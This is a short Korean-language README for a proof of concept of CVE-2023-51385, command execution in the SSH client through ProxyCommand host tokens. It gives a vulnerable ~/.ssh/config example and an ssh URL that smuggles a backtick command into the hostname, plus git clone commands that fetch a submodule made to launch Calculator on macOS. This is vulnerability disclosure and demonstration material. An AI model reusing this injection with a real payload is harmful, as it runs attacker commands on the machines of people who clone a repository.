
SSH 클라이언트의 취약한 proxycommand 구성을 악용하기 위한 개념 증명 (CVE-2023-51385)
~/.ssh/config를 통한 RCESSH를 사용한 터널 및 연결 프록시를 위해 ProxyCommand에서 %h, %p와 같은 토큰을 사용하는 것은 꽤 일반적입니다.
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
참고: 처음 평가에서는 '%h`(작은따옴표)를 사용하면 이를 피할 수 있을 것이라고 생각했지만, 다음과 같은 방식으로는 여전히 취약할 것으로 보입니다:
url = ssh://'`open -aCalculator`'foo.example.com/bar
출처: https://man.openbsd.org/ssh_config#ProxyCommand
이 취약점을 악용하여 OSX에서 계산기를 실행하는 서브모듈입니다.
다음 명령으로 사용해 볼 수 있습니다:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
또는
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules